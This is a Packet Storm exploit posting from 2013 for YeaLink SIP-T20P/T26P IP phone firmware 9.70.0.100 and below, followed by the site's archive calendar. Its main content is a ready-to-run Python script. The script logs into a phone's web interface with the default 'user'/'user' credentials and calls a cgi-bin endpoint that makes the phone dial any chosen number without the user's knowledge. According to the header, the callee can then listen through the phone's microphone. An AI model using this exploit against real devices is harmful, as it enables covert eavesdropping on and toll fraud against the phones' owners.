all things security

YeaLink IP Phone Firmware 9.70.0.100 Missing Authentication

YeaLink IP Phone Firmware 9.70.0.100 Missing Authentication
Posted May 29, 2013
Authored by b0hr

YeaLink IP Phone firmware versions 9.70.0.100 and below suffer from an unauthenticated phone call vulnerability.

tags | exploit, bypass
MD5 | 40b8c4b2eff1d8eba72f06fe7174751b

YeaLink IP Phone Firmware 9.70.0.100 Missing Authentication

Change Mirror Download
# Exploit Title: [YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability]
# Date: [05-28-2013]
# Exploit Author: [b0hr (francisco<[at]>garnelo.eu)]
# Vendor Homepage: [http://yealink.com]
# Software Link: [ http://yealink.com/product_list.aspx?BaseInfoCateId=147&CateId=147&ProductsCateID=147 ]
# Version: 9.70.0.100 and lower]
# Tested on: [YeaLink IP Phone SIP-T20P and SIP-T26P (hardware VoIP phone)]
# Vulnerability : [It's possible to make calls from using the first available sip account, without supervision or confirmation of the user, also the call receiver can listen through the phone mic .]

#!/usr/bin/python

import urllib2, sys

print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"

if (len(sys.argv) != 3):
print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
exit(0)

IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
webU = 'user'
webP = 'user'

query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)


urllib2.install_opener(log)

queryPag = urllib2.urlopen(UrlGet_params)

print "\n Call to %s form IP phone %s\n" %(num,IP)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close